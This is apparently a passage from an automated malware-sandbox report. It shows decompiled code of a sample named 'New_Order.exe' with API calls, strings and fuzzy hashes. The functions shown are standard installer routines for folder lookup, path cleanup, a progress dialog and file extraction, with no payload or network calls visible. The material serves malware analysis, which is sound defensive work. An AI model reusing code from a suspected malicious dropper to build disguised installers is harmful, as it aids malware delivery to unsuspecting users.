                                                                        						if(_t97 != 0x1d) {
                                                                        							__eflags = (_t97 << 0xa) + 0x430000;
                                                                        							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
                                                                        						} else {
                                                                        							E00406055(_t90,  *0x42f428);
                                                                        						}
                                                                        						__eflags = _t97 + 0xffffffeb - 7;
                                                                        						if(_t97 + 0xffffffeb < 7) {
                                                                        							L33:
                                                                        							E004063D2(_t90);
                                                                        						}
                                                                        						goto L42;
                                                                        					}
                                                                        					_t52 =  *0x42f42c;
                                                                        					__eflags = _t52;
                                                                        					_t99 = 2;
                                                                        					if(_t52 >= 0) {
                                                                        						L13:
                                                                        						_a8 = 1;
                                                                        						L14:
                                                                        						__eflags =  *0x42f4c4;
                                                                        						if( *0x42f4c4 != 0) {
                                                                        							_t99 = 4;
                                                                        						}
                                                                        						__eflags = _t80;
                                                                        						if(__eflags >= 0) {
                                                                        							__eflags = _t80 - 0x25;
                                                                        							if(_t80 != 0x25) {
                                                                        								__eflags = _t80 - 0x24;
                                                                        								if(_t80 == 0x24) {
                                                                        									GetWindowsDirectoryA(_t90, 0x400);
                                                                        									_t99 = 0;
                                                                        								}
                                                                        								while(1) {
                                                                        									__eflags = _t99;
                                                                        									if(_t99 == 0) {
                                                                        										goto L30;
                                                                        									}
                                                                        									_t53 =  *0x42f424;
                                                                        									_t99 = _t99 - 1;
                                                                        									__eflags = _t53;
                                                                        									if(_t53 == 0) {
                                                                        										L26:
                                                                        										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                        										__eflags = _t55;
                                                                        										if(_t55 != 0) {
                                                                        											L28:
                                                                        											 *_t90 =  *_t90 & 0x00000000;
                                                                        											__eflags =  *_t90;
                                                                        											continue;
                                                                        										}
                                                                        										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                        										_v12 = _t55;
                                                                        										__imp__CoTaskMemFree(_v8);
                                                                        										__eflags = _v12;
                                                                        										if(_v12 != 0) {
                                                                        											goto L30;
                                                                        										}
                                                                        										goto L28;
                                                                        									}
                                                                        									__eflags = _a8;
                                                                        									if(_a8 == 0) {
                                                                        										goto L26;
                                                                        									}
                                                                        									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                        									__eflags = _t57;
                                                                        									if(_t57 == 0) {
                                                                        										goto L30;
                                                                        									}
                                                                        									goto L26;
                                                                        								}
                                                                        								goto L30;
                                                                        							}
                                                                        							GetSystemDirectoryA(_t90, 0x400);
                                                                        							goto L30;
                                                                        						} else {
                                                                        							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                                                                        							__eflags =  *_t90;
                                                                        							if( *_t90 != 0) {
                                                                        								L31:
                                                                        								__eflags = _v16 - 0x1a;
                                                                        								if(_v16 == 0x1a) {
                                                                        									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							E0040618A(_t66, _t90, _t99, _t90, _v16);
                                                                        							L30:
                                                                        							__eflags =  *_t90;
                                                                        							if( *_t90 == 0) {
                                                                        								goto L33;
                                                                        							}
                                                                        							goto L31;
                                                                        						}
                                                                        					}
                                                                        					__eflags = _t52 - 0x5a04;
                                                                        					if(_t52 == 0x5a04) {
                                                                        						goto L13;
                                                                        					}
                                                                        					__eflags = _v16 - 0x23;
                                                                        					if(_v16 == 0x23) {
                                                                        						goto L13;
                                                                        					}
                                                                        					__eflags = _v16 - 0x2e;
                                                                        					if(_v16 == 0x2e) {
                                                                        						goto L13;
                                                                        					} else {
                                                                        						_a8 = _a8 & 0x00000000;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				 *_t90 =  *_t90 & 0x00000000;
                                                                        				if(_a4 == 0) {
                                                                        					return _t39;
                                                                        				}
                                                                        				return E004060F7(_a4, _t39);
                                                                        			}

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                                        • GetWindowsDirectoryA.KERNEL32(GHFGHFGHFDGDFGDFg,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                        • SHGetSpecialFolderLocation.SHELL32(00405256,7519EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                        • SHGetPathFromIDListA.SHELL32(7519EA30,GHFGHFGHFDGDFGDFg), ref: 00406312
                                                                        • CoTaskMemFree.OLE32(7519EA30), ref: 0040631E
                                                                        • lstrcatA.KERNEL32(GHFGHFGHFDGDFGDFg,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                        • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422448,7519EA30), ref: 00406394
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: GHFGHFGHFDGDFGDFg$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-3709218778
                                                                        • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                        • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                        • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                        • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004063D2(CHAR* _a4) {
                                                                        				char _t5;
                                                                        				char _t7;
                                                                        				char* _t15;
                                                                        				char* _t16;
                                                                        				CHAR* _t17;
                                                                        
                                                                        				_t17 = _a4;
                                                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                        					_t17 =  &(_t17[4]);
                                                                        				}
                                                                        				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
                                                                        					_t17 =  &(_t17[2]);
                                                                        				}
                                                                        				_t5 =  *_t17;
                                                                        				_t15 = _t17;
                                                                        				_t16 = _t17;
                                                                        				if(_t5 != 0) {
                                                                        					do {
                                                                        						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
                                                                        							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						_t17 = CharNextA(_t17);
                                                                        						_t5 =  *_t17;
                                                                        					} while (_t5 != 0);
                                                                        				}
                                                                        				 *_t16 =  *_t16 & 0x00000000;
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, _t16);
                                                                        					_t7 =  *_t16;
                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                        						break;
                                                                        					}
                                                                        					 *_t16 =  *_t16 & 0x00000000;
                                                                        					if(_t15 < _t16) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                        • CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                        Strings
                                                                        • *?|<>/":, xrefs: 0040641A
                                                                        • "C:\Users\user\Desktop\New_Order.exe" , xrefs: 0040640E
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3857985205
                                                                        • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                        • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                        • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                        • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				void* _t44;
                                                                        				signed char _t50;
                                                                        				long* _t54;
                                                                        
                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                        					L18:
                                                                        					return 0;
                                                                        				}
                                                                        				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                        					goto L18;
                                                                        				} else {
                                                                        					_t50 = _t54[5];
                                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                                        						goto L18;
                                                                        					}
                                                                        					_t39 =  *_t54;
                                                                        					if((_t50 & 0x00000002) != 0) {
                                                                        						_t39 = GetSysColor(_t39);
                                                                        					}
                                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                                        						SetTextColor(_a8, _t39);
                                                                        					}
                                                                        					SetBkMode(_a8, _t54[4]);
                                                                        					_t41 = _t54[1];
                                                                        					_v16.lbColor = _t41;
                                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                                        						_t41 = GetSysColor(_t41);
                                                                        						_v16.lbColor = _t41;
                                                                        					}
                                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                                        						SetBkColor(_a8, _t41);
                                                                        					}
                                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                                        						_v16.lbStyle = _t54[2];
                                                                        						_t44 = _t54[3];
                                                                        						if(_t44 != 0) {
                                                                        							DeleteObject(_t44);
                                                                        						}
                                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                                        					}
                                                                        					return _t54[3];
                                                                        				}
                                                                        			}

                                                                        Addresses: 0x004041f4 0x004042aa 0x00000000 0x004042aa 0x00404205 0x00404209 0x00000000 0x00404223 0x00404223 0x0040422c 0x00000000 0x00000000 0x0040422e 0x0040423a 0x0040423d 0x0040423d 0x00404243 0x00404249 0x00404249 0x00404255 0x0040425b 0x00404262 0x00404265 0x00404268 0x0040426a 0x0040426a 0x00404272 0x00404278 0x00404278 0x00404282 0x00404287 0x0040428a 0x0040428f 0x00404292 0x00404292 0x004042a2 0x004042a2 0x00000000 0x004042a5

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                        • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                        • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040521E(CHAR* _a4, CHAR* _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v32;
                                                                        				long _v44;
                                                                        				int _v48;
                                                                        				void* _v52;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				CHAR* _t26;
                                                                        				signed int _t27;
                                                                        				CHAR* _t28;
                                                                        				long _t29;
                                                                        				signed int _t39;
                                                                        
                                                                        				_t26 =  *0x42ec04; // 0x0
                                                                        				_v8 = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					_t27 =  *0x42f4f4;
                                                                        					_v12 = _t27;
                                                                        					_t39 = _t27 & 0x00000001;
                                                                        					if(_t39 == 0) {
                                                                        						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
                                                                        					}
                                                                        					_t26 = lstrlenA(0x42a070);
                                                                        					_a4 = _t26;
                                                                        					if(_a8 == 0) {
                                                                        						L6:
                                                                        						if((_v12 & 0x00000004) == 0) {
                                                                        							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
                                                                        						}
                                                                        						if((_v12 & 0x00000002) == 0) {
                                                                        							_v32 = 0x42a070;
                                                                        							_v52 = 1;
                                                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                        							_v44 = 0;
                                                                        							_v48 = _t29 - _t39;
                                                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                        						}
                                                                        						if(_t39 != 0) {
                                                                        							_t28 = _a4;
                                                                        							 *((char*)(_t28 + 0x42a070)) = 0;
                                                                        							return _t28;
                                                                        						}
                                                                        					} else {
                                                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                        						if(_t26 < 0x800) {
                                                                        							_t26 = lstrcatA(0x42a070, _a8);
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t26;
                                                                        			}

                                                                        Addresses: 0x00405224 0x00405230 0x00405233 0x00405239 0x00405245 0x00405248 0x0040524b 0x00405251 0x00405251 0x00405257 0x0040525f 0x00405262 0x0040527f 0x00405283 0x0040528c 0x0040528c 0x00405296 0x0040529f 0x004052ab 0x004052b2 0x004052b6 0x004052b9 0x004052cc 0x004052da 0x004052da 0x004052de 0x004052e0 0x004052e3 0x00000000 0x004052e3 0x00405264 0x0040526c 0x00405274 0x0040527a 0x00000000 0x0040527a 0x00405274 0x00405262 0x004052ed

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                        • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                        • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,7519EA30), ref: 0040527A
                                                                        • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                        • SendMessageA.USER32 ref: 004052B2
                                                                        • SendMessageA.USER32 ref: 004052CC
                                                                        • SendMessageA.USER32 ref: 004052DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2531174081-0
                                                                        • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                        • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                        • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                        • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				long _v8;
                                                                        				signed char _v12;
                                                                        				unsigned int _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				long _v56;
                                                                        				void* _v60;
                                                                        				long _t15;
                                                                        				unsigned int _t19;
                                                                        				signed int _t25;
                                                                        				struct HWND__* _t28;
                                                                        
                                                                        				_t28 = _a4;
                                                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                        				if(_a8 == 0) {
                                                                        					L4:
                                                                        					_v56 = _t15;
                                                                        					_v60 = 4;
                                                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                        					return _v24;
                                                                        				}
                                                                        				_t19 = GetMessagePos();
                                                                        				_v16 = _t19 >> 0x10;
                                                                        				_v20 = _t19;
                                                                        				ScreenToClient(_t28,  &_v20);
                                                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                        					_t15 = _v8;
                                                                        					goto L4;
                                                                        				}
                                                                        				return _t25 | 0xffffffff;
                                                                        			}

                                                                        Addresses: 0x00404adc 0x00404ae9 0x00404aef 0x00404b2d 0x00404b2d 0x00404b3c 0x00404b43 0x00000000 0x00404b45 0x00404af1 0x00404b00 0x00404b08 0x00404b0b 0x00404b1d 0x00404b23 0x00404b2a 0x00000000 0x00404b2a 0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				char _v68;
                                                                        				int _t11;
                                                                        				int _t20;
                                                                        
                                                                        				if(_a8 == 0x110) {
                                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                                        					_a8 = 0x113;
                                                                        				}
                                                                        				if(_a8 == 0x113) {
                                                                        					_t20 =  *0x41d440; // 0x53fbf
                                                                        					_t11 =  *0x42944c;
                                                                        					if(_t20 >= _t11) {
                                                                        						_t20 = _t11;
                                                                        					}
                                                                        					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                        					SetWindowTextA(_a4,  &_v68);
                                                                        					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        Addresses: 0x00402dc7 0x00402dd5 0x00402ddb 0x00402ddb 0x00402de9 0x00402deb 0x00402df1 0x00402df8 0x00402dfa 0x00402dfa 0x00402e10 0x00402e20 0x00402e32 0x00402e32 0x00402e3a

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                        • MulDiv.KERNEL32(00053FBF,00000064,?), ref: 00402E00
                                                                        • wsprintfA.USER32 ref: 00402E10
                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                        • SetDlgItemTextA.USER32 ref: 00402E32
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402E0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                        • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                        • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                        • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E004027DF(int __ebx) {
                                                                        				void* _t26;
                                                                        				long _t31;
                                                                        				int _t45;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        
                                                                        				_t45 = __ebx;
                                                                        				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                        				_t50 = E00402BCE(0xfffffff0);
                                                                        				 *(_t56 - 0x78) = _t23;
                                                                        				if(E00405AFC(_t50) == 0) {
                                                                        					E00402BCE(0xffffffed);
                                                                        				}
                                                                        				E00405C6B(_t50);
                                                                        				_t26 = E00405C90(_t50, 0x40000000, 2);
                                                                        				 *(_t56 + 8) = _t26;
                                                                        				if(_t26 != 0xffffffff) {
                                                                        					_t31 =  *0x42f438;
                                                                        					 *(_t56 - 0x30) = _t31;
                                                                        					_t49 = GlobalAlloc(0x40, _t31);
                                                                        					if(_t49 != _t45) {
                                                                        						E00403300(_t45);
                                                                        						E004032EA(_t49,  *(_t56 - 0x30));
                                                                        						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                        						 *(_t56 - 0x38) = _t54;
                                                                        						if(_t54 != _t45) {
                                                                        							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                        							while( *_t54 != _t45) {
                                                                        								_t47 =  *_t54;
                                                                        								_t55 = _t54 + 8;
                                                                        								 *(_t56 - 0x8c) =  *_t54;
                                                                        								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                        								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                        							}
                                                                        							GlobalFree( *(_t56 - 0x38));
                                                                        						}
                                                                        						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                        						GlobalFree(_t49);
                                                                        						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                        					}
                                                                        					CloseHandle( *(_t56 + 8));
                                                                        				}
                                                                        				_t51 = 0xfffffff3;
                                                                        				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                        					_t51 = 0xffffffef;
                                                                        					DeleteFileA( *(_t56 - 0x78));
                                                                        					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                        				}
                                                                        				_push(_t51);
                                                                        				E00401423();
                                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                                                                        				return 0;
                                                                        			}











Instruction addresses: 0x004027df .. 0x004028da, 0x004022dd, 0x00402a5d, 0x00402a69

                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                        • GlobalFree.KERNEL32 ref: 0040288E
                                                                        • GlobalFree.KERNEL32 ref: 004028A1
                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                        • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                        • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                        • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
